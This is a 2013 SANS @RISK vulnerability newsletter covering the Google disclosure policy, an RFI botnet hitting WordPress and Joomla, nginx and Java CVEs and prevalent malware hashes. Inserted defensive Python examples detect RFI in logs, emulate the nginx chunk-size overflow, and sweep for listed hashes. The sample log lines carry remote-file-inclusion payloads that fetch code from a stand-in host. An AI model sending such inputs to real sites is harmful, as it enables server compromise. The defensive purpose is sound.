@RISK Newsletter for June 06, 2013 The Consensus Security Vulnerability Alert

This is a weekly newsletter that provides in-depth analysis of the latest vulnerabilities with straightforward remediation advice. Qualys supplies a large part of the newly-discovered vulnerability content used in this newsletter.


@RISK: The Consensus Security Vulnerability Alert
Vol. 13, Num. 23

Providing a reliable, weekly summary of newly discovered attack vectors, vulnerabilities with active exploits, and explanations of how recent attacks worked.

Archived issues may be found at https://www.qualys.com/research/sans-at-risk/


CONTENTS:

NOTABLE RECENT SECURITY ISSUES
USEFUL EXPLANATIONS OF HOW NEW ATTACKS WORK
VULNERABILITIES FOR WHICH EXPLOITS ARE AVAILABLE
MOST PREVALENT MALWARE FILES 5/30/13 - 6/4/13


TOP VULNERABILITY THIS WEEK: Google researcher Tavis Ormandy provided
exploit code for an unpatched local kernel vulnerability in Windows this
week, after having first published details on the Full-Disclosure
mailing list in mid-May. The release coincides with Google’s new
disclosure policy, which gives vendors 7 days on vulnerabilities that
are under active exploitation, down from the 60 days its earlier policy
recommended, before Google will release details.


NOTABLE RECENT SECURITY ISSUES SELECTED BY THE SOURCEFIRE VULNERABILITY RESEARCH TEAM

Title: Google Shifts Policy, Will Release 0-days After A Week; Researcher Provides 0-day PoC
Description: In a major policy announcement made last week, Google
stated that it will publicly disclose details of new vulnerabilities in
other vendors’ products 7 days after reporting them to the vendor, if
those issues are being actively exploited in the wild. This is a major
shift from its previous guideline of 60 days before disclosure. While
acknowledging that 7 days may be too short for vendors to develop a
patch, Google stated that vendors should at least make users aware of
the situation and offer any possible mitigations while a patch is being
developed. Meanwhile, Google researcher Tavis Ormandy has released
exploit code for a local kernel vulnerability in Windows (local, so an
attacker must already be able to run code on the host) ahead of a patch
by Microsoft, after having released initial details in mid-May.
Microsoft stated that it was not aware of any active exploitation prior
to the release of the exploit code, although that is likely to change
now that a public PoC is available.
Reference:
http://googleonlinesecurity.blogspot.ch/2013/05/disclosure-timeline-for-vulnerabilities.html
http://seclists.org/fulldisclosure/2013/May/91
http://seclists.org/fulldisclosure/2013/Jun/5
Snort SID: N/A
ClamAV: N/A

Title: RFI Botnet Compromising WordPress, Joomla Sites Worldwide
Description: Researchers at the Deep End Research group released an
in-depth report this week on a major botnet that has been responsible
for compromising hundreds of thousands of WordPress and Joomla web sites
worldwide over the past year. The report, which is designed to raise
awareness among administrators of these heavily targeted content
management systems, corresponds to attack techniques seen by Sourcefire
since September of 2011. System administrators are urged to check their
systems for signs of compromise by this botnet, and to ensure that their
systems have all of the latest available security patches and
recommended settings applied.
Reference:
http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html
Snort SID: 26813
ClamAV: Trojan.Dapato-*
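The botnet’s name refers to remote file inclusion (RFI): a PHP include() or require() that takes a path from a request parameter and, when handed a URL or a stream wrapper, fetches and runs the attacker’s code. As an added example, not part of the newsletter or of the Deep End Research report, the following Python flags RFI attempts in web-server access logs. The log lines are constructed for illustration, and the combined log format, the parameter names and the list of prefixes are assumptions; the report itself is the source for this botnet’s actual indicators.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache/nginx "combined" log format. They are
# illustrative only and are not taken from the report or from real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jun/2013:10:12:01 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jun/2013:10:12:03 +0000] "GET /wp-content/themes/example/index.php?page=http://198.51.100.9/bot.txt? HTTP/1.1" 200 311 "-" "libwww-perl/5.836"
198.51.100.9 - - [04/Jun/2013:10:12:04 +0000] "GET /components/com_example/view.php?file=http%3A%2F%2F198.51.100.9%2Fid.txt%3F HTTP/1.1" 500 0 "-" "libwww-perl/5.836"
203.0.113.7 - - [04/Jun/2013:10:12:09 +0000] "GET /index.php?tmpl=php://input HTTP/1.1" 200 90 "-" "curl/7.29.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Parameter values that make a PHP include() pull code from somewhere other
# than the local web root: remote URLs and stream wrappers (assumed list).
RFI_PREFIXES = ("http://", "https://", "ftp://", "php://", "data:")

def rfi_kind(value):
    """Return the matching prefix, or None. Decodes once more in case the value was double-encoded."""
    v = unquote(value).strip().lower()
    for prefix in RFI_PREFIXES:
        if v.startswith(prefix):
            return prefix
    return None

def find_rfi_attempts(log_text):
    """Scan combined-format log lines; return one dict per parameter that looks like an RFI payload."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = rfi_kind(value)
            if kind is None:
                continue
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "param": name,
                "value": unquote(value),
                "kind": kind,
                # a 200 on an include of remote code is the case that needs a host check
                "status": int(m.group("status")),
                "ua": m.group("ua"),
            })
    return hits

def sources(hits):
    """Count attempts per source address, the usual starting point for blocking or triage."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG):
        print("%(ip)s %(time)s %(param)s=%(value)s (%(kind)s, HTTP %(status)d)" % h)
```

A hit with a 200 response means the include may have succeeded and the host should be examined for dropped PHP files; a 500 or 404 still identifies a scanning source worth blocking. Run it over real logs by reading the file and passing its text to find_rfi_attempts.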

Title: Black Revolution DDoS Trojan In The Wild
Description: DDoS continues to be a favorite activity of attackers
worldwide, with recent attacks on financial institutions in particular
reaching 100+ Gbps levels. Researchers at Arbor Networks this week
profiled a particularly advanced DDoS trojan by the name of “Black
Revolution” they have been observing in the wild lately, with different
variants of the malware showing its creators’ progress at evading
detection over time.
Reference:
http://ddos.arbornetworks.com/2013/05/the-revolution-will-be-written-in-delphi/
http://www.prolexic.com/news-events-pr-prolexic-stops-largest-ever-dns-reflection-ddos-attack-167-gbps.html
Snort SID: 26713-26715,26725-26750
ClamAV: Win.Trojan.BlackRev

Title: German Torrent Contains Source For 309 Bots
Description: The authors of the well-respected “Malware Must Die” blog
this week published information on a huge dump of botnet source code
they discovered on a German torrent, which has since been shut down.
While most of the source is several years old, it provides valuable
insight into multiple important families of malware, including Zeus,
Skype-based bots, SDbot, and others. The source code is being shared
with security researchers, and should provide useful information for
network defenders worldwide.
Reference:
http://malwaremustdie.blogspot.com/2013/06/full-disclosure-of-309-botbotnet-source.html?spref=tw
Snort SID: Various
ClamAV: Various


USEFUL EXPLANATIONS OF HOW NEW ATTACKS WORK

Shellcodecs - a huge collection of shellcode, loaders, etc.:
http://www.blackhatlibrary.net/Shellcodecs

Ruby’s $SAFE may go away:
https://bugs.ruby-lang.org/issues/8468

Phishing as a service:
http://blog.thinkst.com/2013/06/phish-your-company-before-someone-else.html

Cisco in the sky with diamonds:
http://securityops.wordpress.com/2013/06/01/http_exec-automated-vt-analysis-of-downloaded-executable-files/

How to search encrypted text in SQL server 2005/2008:
http://geekswithblogs.net/chrisfalter/archive/2008/10/06/how-to-search-encrypted-text.aspx

Trawling for Tor hidden services - detection, measurement, deanonymization:
http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf

Microsoft releases new mitigation guidance for Active Directory:
http://blogs.technet.com/b/security/archive/2013/06/03/microsoft-releases-new-mitigation-guidance-for-active-directory.aspx

NSA official mitigations for DDoS:
http://info.publicintelligence.net/NSA-IAD-DDoS.pdf


RECENT VULNERABILITIES FOR WHICH EXPLOITS ARE AVAILABLE COMPILED BY THE QUALYS VULNERABILITY RESEARCH TEAM

This is a list of recent vulnerabilities for which exploits are
available. System administrators can use this list to help in
prioritization of their remediation activities. The Qualys Vulnerability
Research Team compiles this information based on various exploit
frameworks, exploit databases, exploit kits and monitoring of internet
activity.

ID: CVE-2012-5946
Title: IBM SPSS SamplePower C1Tab ActiveX Heap Overflow
Vendor: IBM
Description: Buffer overflow in the c1sizer ActiveX control in
C1sizer.ocx in IBM SPSS SamplePower 3.0 before FP1 allows remote
attackers to execute arbitrary code via a long TabCaption string.
CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

ID: CVE-2013-2028
Title: Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow
Vendor: nginx.org
Description: A stack-based buffer overflow in the chunked transfer-encoding
parser of nginx 1.3.9 through 1.4.0, as included in various vendors’
operating system distributions, could allow remote attackers to crash
the server or execute arbitrary code on the targeted host. A request
with a very large chunk size triggers an integer signedness error in the
chunk-size parsing, and the resulting negative size leads to the stack
buffer overflow. Fixed in nginx 1.4.1 and 1.5.0.
CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
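As an added illustration of the root cause (example code written for this edit, not nginx source), the following Python emulates the bug described above: hex digits of the chunk size are accumulated into a signed 64-bit integer, so a 16-digit chunk size wraps negative, and a consumer that computes min(remaining, buffer_size) and casts the result to an unsigned size_t ends up with an enormous copy length. The “fixed” variant applies the kind of overflow check added in the patched releases. The 64-bit wrapping helper, the 4096-byte buffer constant and the consumer model are assumptions used for illustration.

```python
INT64_MAX = (1 << 63) - 1   # largest positive value of a signed 64-bit off_t
DISCARD_BUFFER = 4096       # assumed size of the fixed stack buffer the consumer copies into

def to_int64(value):
    """Wrap an unbounded Python int the way C arithmetic on a signed 64-bit integer does."""
    value &= (1 << 64) - 1
    return value - (1 << 64) if value >= (1 << 63) else value

def _hex_digits(line):
    """Yield the hex digits of a chunk-size line, stopping at a chunk extension or CRLF."""
    for ch in line.lower():
        if ch in ";\r\n":
            return
        if ch not in "0123456789abcdef":
            raise ValueError("invalid character in chunk size: %r" % ch)
        yield int(ch, 16)

def parse_chunk_size_vulnerable(line):
    """Accumulate digits into a signed 64-bit size with no overflow check (models the pre-fix behaviour)."""
    size = 0
    for digit in _hex_digits(line):
        size = to_int64(size * 16 + digit)
    return size

def parse_chunk_size_fixed(line):
    """Same parser with an overflow guard: refuse another digit if the result could exceed INT64_MAX."""
    size = 0
    for digit in _hex_digits(line):
        if size > INT64_MAX // 16:
            raise ValueError("chunk size too large")
        size = to_int64(size * 16 + digit)
    return size

def bytes_to_copy(remaining):
    """Model the consumer: copy min(remaining, DISCARD_BUFFER) bytes into the buffer, with the
    count cast to size_t. A negative 'remaining' survives the min() and becomes an enormous
    unsigned length, which is the memory-corruption step."""
    count = min(remaining, DISCARD_BUFFER)
    return count & ((1 << 64) - 1)

if __name__ == "__main__":
    crafted = "ffffffffffffffff\r\n"   # constructed 16-digit chunk size
    size = parse_chunk_size_vulnerable(crafted)
    print("vulnerable parser returns:", size)
    print("bytes the consumer would copy:", bytes_to_copy(size))
    try:
        parse_chunk_size_fixed(crafted)
    except ValueError as err:
        print("fixed parser:", err)
```

The lesson generalises beyond nginx: any length parsed into a signed type must be range-checked before it is multiplied and before it is compared against a buffer size, because a negative value passes a “smaller than the buffer” test and then becomes huge on the cast to size_t.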

ID: CVE-2013-1347
Title: Microsoft Internet Explorer 8 Use-After-Free Memory Corruption Vulnerability
Vendor: Microsoft
Description: Microsoft Internet Explorer 8 does not properly handle
objects in memory, which allows remote attackers to execute arbitrary
code by accessing an object that (1) was not properly allocated or (2)
is deleted, as exploited in the wild in May 2013.
CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

ID: CVE-2013-3336
Title: Adobe ColdFusion Information Disclosure Vulnerability (APSB13-13)
Vendor: Adobe
Description: Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1,
9.0.2, and 10 allows remote attackers to read arbitrary files via
unknown vectors.
CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)

ID: CVE-2013-2423
Title: Java Applet Reflection Type Confusion Remote Code Execution
Vendor: Oracle
Description: Unspecified vulnerability in the Java Runtime Environment
(JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK
7, allows remote attackers to affect integrity via unknown vectors
related to HotSpot. NOTE: the previous information is from the April
2013 CPU. Oracle has not commented on claims from the original
researcher that this vulnerability allows remote attackers to bypass
permission checks by the MethodHandles method and modify arbitrary
public final fields using reflection and type confusion, as demonstrated
using integer and double fields to disable the security manager.
CVSS v2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

ID: CVE-2013-1493
Title: Oracle Java SE JVM 2D Subcomponent Remote Code Execution
Vulnerability (Oracle Security Alert for CVE-2013-1493)
Vendor: Oracle
Description: The color management (CMM) functionality in the 2D
component in Oracle Java SE 7 Update 15 and earlier, 6 Update 41 and
earlier, and 5.0 Update 40 and earlier allows remote attackers to
execute arbitrary code or cause a denial of service (crash) via an image
with crafted raster parameters, which triggers (1) an out-of-bounds read
or (2) memory corruption in the JVM, as exploited in the wild in
February 2013.
CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


MOST PREVALENT MALWARE FILES 5/30/13 - 6/4/13 COMPILED BY SOURCEFIRE

SHA 256: 94A1A26F61B015C2CED2FD50BDBA4070B6C9AEC7D2938FBF7EB9E99960D3B7A9
MD5: bfacf78644ca41fd6d4b23976e7574a1
VirusTotal: https://www.virustotal.com/file/94A1A26F61B015C2CED2FD50BDBA4070B6C9AEC7D2938FBF7EB9E99960D3B7A9/analysis/

Typical Filename: RemoveWAT.exe
Claimed Product: RemoveWAT.exe
Claimed Publisher: RemoveWAT.exe

SHA 256: AA0BBAECB678868E1E7F57C7CA9D61B608B3D788BE490790EB1D148BEADF4615
MD5: 3291e1603715c47a23b60a8bf2ca73db
VirusTotal: https://www.virustotal.com/file/AA0BBAECB678868E1E7F57C7CA9D61B608B3D788BE490790EB1D148BEADF4615/analysis/

Typical Filename: 01.tmp
Claimed Product: 01.tmp
Claimed Publisher: 01.tmp

SHA 256: 7BB7125EC5ECF99F975D7CB127009E615847D3FF05FA9F2F79F92CB480B28DC5
MD5: 2f0550df2d7e60752765b44aeb772091
VirusTotal: https://www.virustotal.com/file/7BB7125EC5ECF99F975D7CB127009E615847D3FF05FA9F2F79F92CB480B28DC5/analysis/

Typical Filename: pricepeep_130001_0101.exe
Claimed Product: pricepeep_130001_0101.exe
Claimed Publisher: pricepeep_130001_0101.exe

SHA 256: A6B140EC734C258C5EBF19C0BC0B414B5655ADC00108A038B5BE6A8F83D0BD03
MD5: 8ac1e580cf274b3ca98124580e790706
VirusTotal: https://www.virustotal.com/file/A6B140EC734C258C5EBF19C0BC0B414B5655ADC00108A038B5BE6A8F83D0BD03/analysis/

Typical Filename: Virus.Win32.Sality.ab
Claimed Product: Virus.Win32.Sality.ab
Claimed Publisher: Virus.Win32.Sality.ab

SHA 256: DF83A0D6940600E4C4954F4874FCD4DD73E781E6690C3BF56F51C95285484A3C
MD5: 25aa9bb549ecc7bb6100f8d179452508
VirusTotal: https://www.virustotal.com/file/DF83A0D6940600E4C4954F4874FCD4DD73E781E6690C3BF56F51C95285484A3C/analysis/

Typical Filename: ygrqpx.exe
Claimed Product: ygrqpx.exe
Claimed Publisher: ygrqpx.exe
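As an added example of how a defender would use the list above (example code written for this edit, not Sourcefire tooling), the following Python sweeps a directory tree and reports any file whose SHA-256 or MD5 matches one of the five entries. The hashes are embedded from the list; the files the demo writes are harmless constructed text, and the demo plants one of them into a copy of the indicator set by its own hash so that the match path is exercised offline. The directory layout and file contents are assumptions.

```python
import hashlib
import os
import tempfile

# The SHA-256 and MD5 values from the list above, keyed to the typical filename.
# Normalised to lower case because tools report hex digests in either case.
IOC_HASHES = {
    "94a1a26f61b015c2ced2fd50bdba4070b6c9aec7d2938fbf7eb9e99960d3b7a9": "RemoveWAT.exe",
    "bfacf78644ca41fd6d4b23976e7574a1": "RemoveWAT.exe",
    "aa0bbaecb678868e1e7f57c7ca9d61b608b3d788be490790eb1d148beadf4615": "01.tmp",
    "3291e1603715c47a23b60a8bf2ca73db": "01.tmp",
    "7bb7125ec5ecf99f975d7cb127009e615847d3ff05fa9f2f79f92cb480b28dc5": "pricepeep_130001_0101.exe",
    "2f0550df2d7e60752765b44aeb772091": "pricepeep_130001_0101.exe",
    "a6b140ec734c258c5ebf19c0bc0b414b5655adc00108a038b5be6a8f83d0bd03": "Virus.Win32.Sality.ab",
    "8ac1e580cf274b3ca98124580e790706": "Virus.Win32.Sality.ab",
    "df83a0d6940600e4c4954f4874fcd4dd73e781e6690c3bf56f51c95285484a3c": "ygrqpx.exe",
    "25aa9bb549ecc7bb6100f8d179452508": "ygrqpx.exe",
}

def hash_file(path, chunk_size=1 << 20):
    """Return (md5, sha256) hex digests, reading in chunks so large files do not exhaust memory."""
    md5 = hashlib.md5()
    sha256 = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            md5.update(block)
            sha256.update(block)
    return md5.hexdigest(), sha256.hexdigest()

def sweep(root, iocs=IOC_HASHES):
    """Walk root and return (path, sha256, label) for every file whose SHA-256 or MD5 is in iocs."""
    matches = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                md5, sha256 = hash_file(path)
            except OSError:
                continue  # unreadable or vanished file: skip it, do not abort the sweep
            label = iocs.get(sha256.lower()) or iocs.get(md5.lower())
            if label:
                matches.append((path, sha256, label))
    return matches

def demo():
    """Constructed demonstration: two harmless text files in a temp dir, one of them added
    to a copy of the indicator set by its own SHA-256. Returns (labels matched against the
    extended set, matches against the real list), the latter empty for these files."""
    with tempfile.TemporaryDirectory() as tmp:
        benign = os.path.join(tmp, "readme.txt")
        planted = os.path.join(tmp, "sub", "sample.bin")
        os.makedirs(os.path.dirname(planted))
        with open(benign, "wb") as fh:
            fh.write(b"nothing to see here\n")
        with open(planted, "wb") as fh:
            fh.write(b"constructed sample, not malware\n")
        extended = dict(IOC_HASHES)
        extended[hash_file(planted)[1]] = "constructed-sample"
        labels = [label for _path, _sha, label in sweep(tmp, extended)]
        return labels, sweep(tmp)

if __name__ == "__main__":
    print(demo())
```

For a real sweep call sweep("/path/to/check") and review the returned tuples; a SHA-256 match is conclusive, while MD5 is kept only because some feeds still publish it.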

